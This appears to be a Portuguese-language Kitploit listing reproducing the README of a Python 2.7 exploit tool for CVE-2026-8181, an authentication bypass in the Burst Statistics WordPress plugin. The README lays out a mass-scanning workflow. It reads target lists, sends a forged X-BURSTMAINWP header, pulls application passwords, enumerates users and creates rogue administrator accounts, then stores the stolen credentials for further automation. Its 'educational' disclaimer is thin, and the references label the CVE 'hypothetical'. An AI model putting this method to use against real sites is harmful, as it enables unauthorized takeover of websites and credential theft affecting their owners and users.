Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-8181 — CVE-2026-8181: Bypass de Auth do Burst Statistics → takeover da API REST e criação de admin. Python 2.7. Apenas para uso educacional. | Kitploit
Ferramentas/GitHubGitHub/jenderal92/cve-2026-8181
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoAprendizado e Educação
GitHubjenderal92/cve-2026-8181

CVE-2026-8181

CVE-2026-8181: Bypass de Auth do Burst Statistics → takeover da API REST e criação de admin. Python 2.7. Apenas para uso educacional.

Ver Repositório
7há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-8181 - Exploração de Bypass de Autenticação do Burst Statistics

Python 2.7 exploit para a vulnerabilidade do plugin Burst Statistics (CVE-2026-8181) que permite a atacantes não autenticados contornar a autenticação da API REST, recuperar senhas de aplicativos e criar novos usuários administradores em sites WordPress vulneráveis.

⚠️ Aviso
Esta ferramenta é apenas para fins educacionais e de teste de segurança autorizado. O acesso não autorizado a sistemas informáticos é ilegal. Use apenas em sites que você possui ou para os quais tenha permissão explícita para testar. Mais avisos: Você pode ver o aviso na capa de Jenderal92. Pode verificá-lo AQUI !!!

O CVE-2026-8181 afeta o plugin Burst Statistics para WordPress (versões anteriores ao patch). A falha reside no mecanismo de autenticação da API REST, permitindo que um atacante:

  • Contorne a autenticação enviando um cabeçalho X-BURSTMAINWP manipulado
  • Recupere senhas de aplicativos através do endpoint /burst/v1/mainwp-auth
  • Execute ações privilegiadas (listar usuários, ler configurações, criar novas contas de administrador) através da API REST do WordPress

Funcionalidades

  • Varredura multi-thread (10 threads por padrão)
  • Detecção automática de caminhos base do WordPress (/, /wordpress, /wp)
  • Enumeração de nomes de usuário via /wp-json/wp/v2/users ou redirecionamentos por ID de autor
  • Exploração do bypass de autenticação para:
    • Obter senhas de aplicativos (token codificado em Base64)
    • Verificar acesso a endpoints REST sensíveis (configurações, plugins, usuários admin)
    • Criar um novo usuário administrador com credenciais aleatórias
  • Dois arquivos de saída:
    • res_login.txt – Credenciais REST API concisas, separadas por pipe (fáceis de analisar/importar)
    • full_res_login.txt – Relatório completo legível por humanos, incluindo verificação de acesso e senhas de aplicativos

Requisitos

  • Python 2.7 (obsoleto, mas necessário para o script)
  • Biblioteca requests
pip install requests

Uso

  1. Prepare um arquivo de lista de alvos (um domínio ou IP por linha, com ou sem http:///https://).

    Exemplo targets.txt:

    example.com
    https://vulnerable-site.com
    127.0.0.1/wordpress
    
  2. Execute o exploit:

python2 CVE-2026-8181.py targets.txt
  1. Os resultados são salvos em dois arquivos no diretório atual:
    • res_login.txt – Credenciais REST API (uma linha por alvo vulnerável)
    • full_res_login.txt – Relatório detalhado

Opções da Linha de Comando

ArgumentoDescrição
list.txtCaminho para o arquivo que contém as URLs alvo

Exemplo de Saída (Console)

============================================================
CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
============================================================
[*] Total targets: 2
[*] Threads: 10
[*] Base paths: ['', '/wordpress', '/wp']

[*] Scanning: example.com
    Trying path: /
    Detected username: admin
    [+] VULNERABLE! REST API bypass successful
    [+] Application Password obtained!
    [+]   Username: admin
    [+]   App Password: xxxx xxxx xxxx
    [+]   Base64 Token: YWRtaW46eHh4eA==
    [+] Access confirmed: WordPress settings
    [+] Access confirmed: Installed plugins
    [+] Access confirmed: Admin users
    [+] Admin user created via REST API: wp_abc123
    [+] Results saved to res_login.txt and full_res_login.txt

Formatos dos Arquivos de Saída

1. res_login.txt – Credenciais REST API Concisas

Cada linha segue este formato separado por pipe:

alvo|nome_utilizador|palavra_passe|email|id_utilizador

Exemplo:

http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42

Este formato é ideal para:

  • Importar para gestores de palavras-passe ou bases de dados
  • Automatizar ações adicionais (por exemplo, scripts de login)
  • Inspeção rápida com cut, grep ou Excel

2. full_res_login.txt – Relatório Detalhado Completo

Para cada alvo vulnerável, o script anexa um bloco legível por humanos:

============================================================
Target: http://example.com
============================================================

[+] Access Verification:
    [+] WordPress settings
    [+] Installed plugins
    [+] Admin users

[+] REST API Credentials:
    Username: wp_abc123
    Password: random12char
    Email: [email protected]
    User ID: 42
    URL: http://example.com/wp-admin/
    Note: Use with X-BURSTMAINWP header

[+] Application Password:
    Username: admin
    App Password: xxxx xxxx xxxx
    Base64 Token: YWRtaW46eHh4eA==

Nota: Se o endpoint de senha de aplicativo não estiver disponível ou não retornar nenhum token, essa seção mostrará FAILED.

Como Funciona

  1. Preparação do alvo – Adiciona o prefixo http:// se estiver ausente, remove barras finais.
  2. Iteração de caminhos – Tenta /, /wordpress e /wp como diretórios base do WordPress.
  3. Enumeração de nomes de utilizador – Obtém /wp-json/wp/v2/users ou usa redirecionamentos ?author=N.
  4. Teste de bypass – Envia X-BURSTMAINWP: 1 + autenticação Basic com nome de utilizador e palavra-passe fictícia (CVE-2026-8181). Se o endpoint /wp-json/wp/v2/users/me?context=edit retornar 200, o site está vulnerável.
  5. Exploração –
    • Solicita /wp-json/burst/v1/mainwp-auth para recuperar um token de senha de aplicativo.
    • Verifica acesso a /settings, /plugins, /users.
    • Cria uma nova conta de administrador via POST /wp-json/wp/v2/users.
  6. Salvamento de resultados – Escreve credenciais REST concisas em res_login.txt e detalhes completos em full_res_login.txt.

Personalização

Pode modificar estas variáveis dentro do script:

  • THREADS – Número de threads simultâneas (padrão 10)
  • BASE_PATHS – Subdiretórios adicionais do WordPress a verificar
  • Valores de timeout da biblioteca requests

Licença

Este projeto é fornecido apenas para fins educacionais. Use por sua conta e risco.

Referências

  • Detalhe do CVE-2026-8181 (hipotético)
  • Plugin Burst Statistics (versões afetadas)
Baixar ferramenta